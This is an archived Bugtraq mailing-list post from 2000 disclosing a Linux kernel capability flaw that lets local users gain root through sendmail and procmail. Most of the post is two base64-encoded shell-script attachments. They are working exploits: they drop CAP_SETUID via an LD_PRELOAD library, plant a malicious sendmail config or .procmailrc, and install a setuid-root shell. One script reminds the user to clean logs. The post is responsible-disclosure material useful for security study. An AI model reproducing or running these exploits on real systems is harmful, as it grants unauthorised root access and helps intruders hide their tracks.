[15293] in bugtraq
Sendmail & procmail local root exploits on Linux kernel up to
daemon@ATHENA.MIT.EDU (Wojciech Purczynski)
Sat Jun 10 04:16:31 2000
Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="-187401051-160577840-960533976=:3475"
Message-Id: <Pine.LNX.4.21.0006090852340.3475-300000@alfa.elzabsoft.pl>
Date: Fri, 9 Jun 2000 08:59:36 +0200
Reply-To: Wojciech Purczynski <wp@ELZABSOFT.PL>
From: Wojciech Purczynski <wp@ELZABSOFT.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
---187401051-160577840-960533976=:3475
Content-Type: TEXT/PLAIN; charset=US-ASCII
A few days ago while I was coding my kernel module I discovered a problem
with Linux capability model. My idea was to drop inheritable capability
set as non-root user and then execute some setuid-root program that would
be unable to drop its privileges.
I wrote two versions of proof-of-concept exploits. The day after, I
contacted linux and sendmail developers. They created patches that have
been available since yesterday. Procmail developers have been contacted,
as well, since procmail is also affected by this kernel bug.
Exploits are attached to this message.
-wp
+--------------------------------------------------------------------+
| Wojciech Purczynski wp@elzabsoft.pl http://www.elzabsoft.pl/~wp |
| GSM: +48604432981 Linux Administrator SMS: wp-sms@elzabsoft.pl |
+------ Public GnuPG Key: http://www.elzabsoft.pl/~wp/gpg.asc ------+
---187401051-160577840-960533976=:3475
Content-Type: TEXT/PLAIN; charset=US-ASCII; name=smlnx
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0006090859360.3475@alfa.elzabsoft.pl>
Content-Description: sendmail exploit
Content-Disposition: attachment; filename=smlnx
IyEvYmluL3NoDQoNCmVjaG8gIistLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSsiDQplY2hvICJ8
ICAgICAgTGludXgga2VybmVsIDIuMi5YIChYPD0xNSkgJiBzZW5kbWFpbCA8
PSA4LjEwLjEgICAgICB8Ig0KZWNobyAifCAgICAgICAgICAgICAgICAgICAg
bG9jYWwgcm9vdCBleHBsb2l0ICAgICAgICAgICAgICAgICAgICAgfCINCmVj
aG8gInwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgIHwiDQplY2hvICJ8ICAgQnVncyBmb3VuZCBh
bmQgZXhwbG9pdCB3cml0dGVuIGJ5IFdvamNpZWNoIFB1cmN6eW5za2kgICB8
Ig0KZWNobyAifCAgICAgIHdwQGVsemFic29mdC5wbCAgIGNsaXBoL2lyY25l
dCAgIFZvb3llYy9kYWxuZXQgICAgICAgfCINCmVjaG8gIistLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLSsiDQoNClRNUERJUj0vdG1wL2Zvbw0KU1VJRFNIRUxMPS90bXAvc3Vz
aA0KU0hFTEw9L2Jpbi90Y3NoDQoNCnVtYXNrIDAyMg0KZWNobyAiQ3JlYXRp
bmcgdGVtcG9yYXJ5IGRpcmVjdG9yeSINCm1rZGlyIC1wICRUTVBESVINCmNk
ICRUTVBESVINCg0KZWNobyAiQ3JlYXRpbmcgYW50aS1ub2V4ZWMgbGlicmFy
eSAoY2FwZHJvcC5jKSINCmNhdCA8PF9GT0VfID4gY2FwZHJvcC5jDQojZGVm
aW5lIF9fS0VSTkVMX18NCiNpbmNsdWRlIDxsaW51eC9jYXBhYmlsaXR5Lmg+
DQojdW5kZWYgX19LRVJORUxfXw0KI2luY2x1ZGUgPGxpbnV4L3VuaXN0ZC5o
Pg0KX3N5c2NhbGwyKGludCwgY2Fwc2V0LCBjYXBfdXNlcl9oZWFkZXJfdCwg
aGVhZGVyLCBjb25zdCBjYXBfdXNlcl9kYXRhX3QsIGRhdGEpDQpleHRlcm4g
aW50IGNhcHNldChjYXBfdXNlcl9oZWFkZXJfdCBoZWFkZXIsIGNhcF91c2Vy
X2RhdGFfdCBkYXRhKTsNCnZvaWQgdW5zZXRlbnYoY29uc3QgY2hhciopOw0K
dm9pZCBfaW5pdCh2b2lkKSB7DQoJc3RydWN0IF9fdXNlcl9jYXBfaGVhZGVy
X3N0cnVjdCBjYXBoPXtfTElOVVhfQ0FQQUJJTElUWV9WRVJTSU9OLCAwfTsN
CglzdHJ1Y3QgX191c2VyX2NhcF9kYXRhX3N0cnVjdCBjYXBkPXswLCAwLCAw
eGZmZmZmZTdmfTsNCgl1bnNldGVudigiTERfUFJFTE9BRCIpOw0KCWNhcHNl
dCgmY2FwaCwgJmNhcGQpOyANCglzeXN0ZW0oImVjaG98L3Vzci9zYmluL3Nl
bmRtYWlsIC1DJFRNUERJUi9zbS5jZiAkVVNFUiIpOw0KfQ0KX0ZPRV8NCmVj
aG8gIkNvbXBpbGluZyBhbnRpLW5vZXhlYyBsaWJyYXJ5IChjYXBkcm9wLnNv
KSINCmNjIGNhcGRyb3AuYyAtYyAtbyBjYXBkcm9wLm8NCmxkIC1zaGFyZWQg
Y2FwZHJvcC5vIC1vIGNhcGRyb3Auc28NCg0KZWNobyAiQ3JlYXRpbmcgc3Vp
ZCBzaGVsbCAoc3VzaC5jKSINCmNhdCA8PF9GT0VfID4gc3VzaC5jDQojaW5j
bHVkZSA8dW5pc3RkLmg+DQppbnQgbWFpbigpIHsgc2V0dWlkKDApOyBzZXRn
aWQoMCk7IGV4ZWNsKCIvYmluL3NoIiwgInNoIiwgTlVMTCk7IH0NCl9GT0Vf
DQoNCmVjaG8gIkNvbXBpbGluZyBzdWlkIHNoZWxsIChzdXNoLmMpIg0KY2Mg
c3VzaC5jIC1vICRUTVBESVIvc3VzaA0KDQplY2hvICJDcmVhdGluZyBzaGVs
bCBzY3JpcHQiDQpjYXQgPDxfRk9FXyA+c2NyaXB0DQptdiAkVE1QRElSL3N1
c2ggJFNVSURTSEVMTA0KY2hvd24gcm9vdC5yb290ICRTVUlEU0hFTEwNCmNo
bW9kIDQxMTEgJFNVSURTSEVMTA0KZXhpdCAwDQpfRk9FXw0KDQplY2hvICJD
cmVhdGluZyBvd24gc20uY2YiDQpjYXQgPDxfRk9FXyA+JFRNUERJUi9zbS5j
Zg0KTyBRdWV1ZURpcmVjdG9yeT0kVE1QRElSDQpPIEZvcndhcmRQYXRoPS9u
b19mb3J3YXJkX2ZpbGUNClMwDQpSXCQqCVwkI2xvY2FsIFwkOiBcJDENCk1s
b2NhbCwJUD0kU0hFTEwsIEY9bHNERk1BdzU6L3xAcVNQZmhuOSwgUz1FbnZG
cm9tTC9IZHJGcm9tTCwgUj1FbnZUb0wvSGRyVG9MLA0KCVQ9RE5TL1JGQzgy
Mi9YLVVuaXgsIEE9JFNIRUxMICRUTVBESVIvc2NyaXB0DQpfRk9FXw0KDQpl
Y2hvICJEcm9wcGluZyBDQVBfU0VUVUlEIGFuZCBjYWxsaW5nIHNlbmRtYWls
Ig0KZXhwb3J0IExEX1BSRUxPQUQ9JFRNUERJUi9jYXBkcm9wLnNvDQovYmlu
L3RydWUNCnVuc2V0IExEX1BSRUxPQUQNCg0KZWNobyAiV2FpdGluZyBmb3Ig
c3VpZCBzaGVsbCAoJFNVSURTSEVMTCkiDQp3aGlsZSBbICEgLWYgJFNVSURT
SEVMTCBdOyBkbyBzbGVlcCAxOyBkb25lDQoNCmVjaG8gIlJlbW92aW5nIGV2
ZXJ5dGhpbmciDQpjZCAuLg0Kcm0gLWZyICRUTVBESVINCg0KZWNobyAiU3Vp
ZCBzaGVsbCBhdCAkU1VJRFNIRUxMIg0KJFNVSURTSEVMTA0K
---187401051-160577840-960533976=:3475
Content-Type: TEXT/PLAIN; charset=US-ASCII; name=prlnx
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.21.0006090859361.3475@alfa.elzabsoft.pl>
Content-Description: sendmail & procmail exploit
Content-Disposition: attachment; filename=prlnx
IyEvYmluL3NoDQoNCmVjaG8gIistLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLSsiDQplY2hvICJ8ICAgU2Vu
ZG1haWwgJiBwcm9jbWFpbCAmIGtlcm5lbCBsb2NhbCByb290IGV4cGxvaXQg
ICB8Ig0KZWNobyAifCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgfCINCmVjaG8gInxCdWdzIGZvdW5kIGFu
ZCBleHBsb2l0IHdyaXR0ZW4gYnkgV29qY2llY2ggUHVyY3p5bnNraXwiDQpl
Y2hvICJ8ICAgIHdwQGVsemFic29mdC5wbCAgIGNsaXBoL2lyY25ldCAgVm9v
eWVjL2RhbG5ldCAgICB8Ig0KZWNobyAiKy0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tKyINCg0KZWNobyBD
cmVhdGluZyBjYXAuYw0KDQpjYXQgPDxfRk9FXyA+IGNhcC5jDQojZGVmaW5l
IF9fS0VSTkVMX18NCiNpbmNsdWRlIDxsaW51eC9jYXBhYmlsaXR5Lmg+DQoj
dW5kZWYgX19LRVJORUxfXw0KI2luY2x1ZGUgPGxpbnV4L3VuaXN0ZC5oPg0K
DQpfc3lzY2FsbDIoaW50LCBjYXBzZXQsIGNhcF91c2VyX2hlYWRlcl90LCBo
ZWFkZXIsIGNvbnN0IGNhcF91c2VyX2RhdGFfdCwgZGF0YSkNCmV4dGVybiBp
bnQgY2Fwc2V0KGNhcF91c2VyX2hlYWRlcl90IGhlYWRlciwgY2FwX3VzZXJf
ZGF0YV90IGRhdGEpOw0KaW50IG1haW4oKQ0Kew0KCXN0cnVjdCBfX3VzZXJf
Y2FwX2hlYWRlcl9zdHJ1Y3QgY2FwaD17DQoJCV9MSU5VWF9DQVBBQklMSVRZ
X1ZFUlNJT04sDQoJCTANCgl9Ow0KCXN0cnVjdCBfX3VzZXJfY2FwX2RhdGFf
c3RydWN0IGNhcGQ9ew0KICAgICAgICAJMCwNCgkJMCwNCgkJMHhmZmZmZmU3
Zg0KCX07DQoJY2Fwc2V0KCZjYXBoLCAmY2FwZCk7DQoJc3lzdGVtKCJlY2hv
fC91c3Ivc2Jpbi9zZW5kbWFpbCAkVVNFUiIpOw0KfQ0KX0ZPRV8NCg0KZWNo
byBDcmVhdGluZyAkSE9NRS8ucHJvY21haWxyYw0KUFJPQ01BSUxSQ0JBSz0k
SE9NRS8ucHJvY21haWxyYy5iYWsNCm12IC1mICRIT01FLy5wcm9jbWFpbHJj
ICRQUk9DTUFJTFJDQkFLDQpjYXQgPDxfRk9FXyA+ICRIT01FLy5wcm9jbWFp
bHJjDQo6SA0KKg0KfC9iaW4vdGNzaCAtYyAicm0gLWZyIC9iaW4vc3VzaDsg
bXYgLWYgL3RtcC9zdXNoIC9iaW4vc3VzaDsgY2hvd24gcm9vdC5yb290IC9i
aW4vc3VzaDsgY2htb2QgNDExMSAvYmluL3N1c2giDQpfRk9FXw0KDQplY2hv
IENvbXBpbGluZyBjYXAuYyAtPiBjYXANCmNjIGNhcC5jIC1vIGNhcA0KDQpl
Y2hvIENyZWF0aW5nIHN1c2guYw0KY2F0IDw8X0ZPRV8gPiBzdXNoLmMNCiNp
bmNsdWRlIDx1bmlzdGQuaD4NCmludCBtYWluKCkNCnsNCglzZXR1aWQoMCk7
DQoJc2V0Z2lkKDApOw0KCWV4ZWNsKCIvYmluL2Jhc2giLCAiYmFzaCIsIE5V
TEwpOw0KfQ0KX0ZPRV8NCg0KZWNobyBDb21waWxpbmcgc3VzaA0KY2Mgc3Vz
aC5jIC1vIC90bXAvc3VzaA0KDQplY2hvIEV4ZWN1dGluZyBjYXANCi4vY2Fw
DQplY2hvIERvblwndCBmb3JnZXQgdG8gY2xlYW4gbG9ncw0KDQplY2hvIFdh
aXRpbmcgZm9yIHN1aWQgc2hlbGwNCndoaWxlIFsgISAtZiAvYmluL3N1c2gg
XTsgZG8NCnNsZWVwIDENCmRvbmUNCg0KZWNobyBDbGVhbmluZyBldmVyeXRo
aW5nDQpybSAtZnIgJEhPTUUvLnByb2NtYWlscmMgY2FwLmMgY2FwIHN1c2gu
Yw0KbXYgJFBST0NNQUlMUkNCQUsgJEhPTUUvLnByb2NtYWlscmMNCg0KZWNo
byBFeGVjdXRpbmcgc3VpZCBzaGVsbA0KL2Jpbi9zdXNoDQo=
---187401051-160577840-960533976=:3475--
